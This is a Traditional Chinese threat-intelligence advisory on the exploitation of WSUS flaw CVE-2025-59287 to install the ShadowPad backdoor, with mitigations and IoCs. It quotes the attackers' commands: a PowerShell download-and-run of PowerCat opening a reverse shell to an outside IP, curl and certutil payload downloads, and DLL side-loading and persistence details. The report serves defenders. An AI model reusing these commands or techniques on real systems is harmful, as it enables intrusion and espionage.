【精選威脅情資】微軟 WSUS 重大漏洞，遭中國駭客以 ShadowPad 快速濫用

‍

危害與影響

自今 (2025) 年 10 月 14 日微軟發佈漏洞公告及 10 月 22 日公開 PoC 後，攻擊者迅速武器化此漏洞，針對啟用 Windows Server Update Services (下稱 WSUS) 的 Windows 伺服器發動攻擊。多個來源皆觀察到，現實場域中的微軟 WSUS 重大 Remote Code Execution （下稱 RCE）漏洞（CVE-2025-59287）已被投放 ShadowPad 後門程式。攻擊者利用 PowerCat 取得系統層級 shell，運用系統內建工具（curl 與 certutil），以 DLL 側載方式部署並安裝 ShadowPad。

‍

分析師觀點

此事件主要警示在於：從微軟公開 PoC 到野外濫用僅數日，可以修補漏洞的時間極為短暫。攻擊者濫用 PowerShell、certutil.exe、curl.exe等常見工具，減少對已知惡意程式的依賴，更增加特徵碼偵測困難度。ShadowPad 透過 DLL 側載主要在記憶體內執行，注入常見 Windows 程序，並藉由 Run key 及排程任務維持存活，降低被偵測機率，實現長期存取。所有運行 WSUS 的 Windows 伺服器，特別是暴露於網際網路（TCP 8530/8531）或存取控管薄弱者將會是主要受影響者。

‍

描述

ShadowPad 是一款私人販售、多為具中國國家背景 APT 組織所用的後門，能建立隱蔽且持久的存取通道，透過 443 埠的 HTTP/HTTPS、模仿瀏覽器的標頭並混淆正常流量。WSUS 則是企業核心基礎設施，駭客可透過 RCE 漏洞、遠端取得 WSUS 上的系統權限作為初始立足點，進而控制整個場域並橫向移動。

‍

技術分析

偵查 (Reconnaissance)

攻擊者遍歷於 TCP 8530/8531 存取的 WSUS 伺服器，尋找適合以 CVE-2025-59287 （WSUS RCE）攻擊的目標。

初始存取 (Initial Access)

利用 CVE-2025-59287 以 SYSTEM 權限在目標伺服器執行命令，攻擊者隨即用 PowerShell 下載並執行 PowerCat，獲得互動式 CMD shell。

powershell.exe-c IEX (New-Object System.Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1’)
;powercat -c 154.17.26[.]41 -p 8080 -e cmd

執行 (Execution)

獲得初始存取後，再執行合法的 Windows 公用程式 curl.exe 和 certutil.exe，以安裝 ShadowPad 惡意軟體。

curlhxxp://149.28.78[.]189:42306/tmp.txt -o C:\users\%ASD%\tmp.txt & curlhxxp://149.28.78[.]189:42306/dll.txt -o C:\users\%ASD%\dll.txt & curlhxxp://149.28.78[.]189:42306/exe.txt -o C:\users\%ASD%\exe.txt certutil-decode C:\users\%ASD%\tmp.txt C:\programdata\0C137A80.tmp

DLL 側載觸發 ShadowPad

• 使用合法 EXE：ETDCtrlHelper.exe（MD5: 564e7d39a9b6da3cf0da3373351ac717）
• 載入惡意 DLL：ETDApix.dll（MD5: 27e00b5594530e8c5e004098eef2ec50）
• 使用靜態設定檔：0C137A80.tmp（MD5: 85b935e80e84dd47e0fa5e1dfb2c16f4）

將合法 EXE 與惡意 DLL 放在一起，確保受信任執行檔載入惡意 DLL，進而解密或載入 ShadowPad 核心，此程序完全於記憶體執行。

持續性（Persistence）

• Persistence Registry Key：HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  
  • Value: “Q‑X64”
• 排程任務：Microsoft\Windows\UPnP 路徑下，取名為 “Microsoft Corporation”
• ‍啟動位置：
  
  • %ProgramFiles%\Q‑X64\Q‑X64.exe
  • %APPDATA%\Q‑X64\Q‑X64.exe
  • %LOCALAPPDATA%\Q‑X64\Q‑X64.exe
  • %TEMP%\Q‑X64\Q‑X64.exe

防禦規避（DefenseEvasion）

• 活用內建工具：PowerShell 下載後執行 PowerCat、curl.exe及 certutil.exe 並解碼 payload，減少對自訂惡意程式的依賴。
• DLL 側載：利用受信任的 ETDCtrlHelper.exe 載入 ETDApix.dll，隱蔽執行過程並規避特徵碼監測。
• 記憶體執行：載入器全部於記憶體操作，僅用 0C137A80.tmp 作為磁碟暫存，降低明顯 PE 檔案蹤跡。
• 偽裝或良性命名：Payload 以 .tmp 暫存，持續性則以微軟官方命名風格混淆，如：Microsoft Corporation 排程、Q‑X64 服務等。
• 網路偽裝：C2 採用 443 埠傳輸 HTTP POST 流量，藉由模擬標頭特徵（包含：Firefox 87 UA、Accept-Language、gzip/deflate）來規避資安工具對異常流量的偵測。

命令與控制（Commandand Control）

• 第一階段：
  使用 PowerCat 獲得控制權 (Reverse Shell) 。
  powercat -c 154.17.26[.]41 -p 8080 -e cmd
• 第二階段：
  ShadowPad C2 回報與指令。
  端點：http://163.61.102.245:443/
  協定：HTTP/HTTPS POST，標頭模仿 Firefox：
  User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
  Accept-Language:en-ca,en;q=0.8,en-us;q=0.6,de-de;q=0.4,de;q=0.2
  Accept-Encoding:gzip, deflate
  Accept:text/html, application/xhtml+xml, image/jxr, /

外洩（Exfiltration）

透過 C2 通道163.61.102[.]245:443 外洩資料。

‍‍

緩解措施

移除 WSUS RCE 攻擊向量

所有 WSUS 伺服器套用微軟針對 CVE-2025-59287 的安全更新，重開機完成緩解，便可移除本事件被濫用的 RCE 向量。如需延後修補，建議暫時停用 WSUS 伺服器角色，或於主機/邊界防火牆阻斷 TCP 8530/8531。

管理 WSUS 曝險

應將 WSUS 移至防火牆後方以取消外網曝險，僅開放必要子網與管理員存取。限制其連外對象僅限 Microsoft Update，並封鎖 8530/8531 埠的非必要進端流量。建議強制使用 8531 HTTPS 通訊並關閉 8530 HTTP 連線。

WSUS 主機安全配置
使用最小權限帳號登錄 ACL，防止在未授權情況下寫入 Program Files、ProgramData、AppData 與 Temp。強制執行 AppLocker/WDAC 允許清單，僅運行已核准簽署的二進位檔，封鎖未授權路徑之 DLL 側載。透過維持 SafeDllSearchMode 與移除冗餘軟體，減少 DLL 側載攻擊面。

偵測並封鎖惡意基礎設施

企業應主動監控並封鎖與事件相關的惡意基礎設施，IP、URL、相關樣本 hash 等，可以參考 IOC 章節。

‍參考資料

• Analysisof ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability(CVE-2025-59287)
• 中國駭客加入利用WSUS重大漏洞的行列，以此散布ShadowPad
• SentinelOne Uncovers Chinese Espionage Campaign Targeting Its Infrastructure and Clients
• Redfly: Espionage Actors Continue to Target CriticalInfrastructure
• ShadowPad Malware Deployed via WSUS RCE Vulnerability in New ChineseCyber Campaign

‍

入侵指標 (Indicator of Compromise, IoCs)

IP

• 154.17.26.41:8080
• 149.28.78.189:42306

URL

HTTP://163.61.102[.]245:443

惡意檔案路徑(File Paths)

• %ProgramFiles%\Q-X64\Q-X64.exe
• %APPDATA%\Q-X64\Q-X64.exe
• %LOCALAPPDATA%\Q-X64\Q-X64.exe
• %TEMP%\Q-X64\Q-X64.exe

帶有 Q-X64 參數的執行指令

• “%PROGRAMFILES%\WindowsMail\WinMail.exe” Q-X64
• “%PROGRAMFILES%\WindowsMedia Player\wmpnetwk.exe” Q-X64
• “%ProgramFiles%\WindowsMedia Player\wmplayer.exe” Q-X64
• “%SystemRoot%\system32\svchost.exe”Q-X64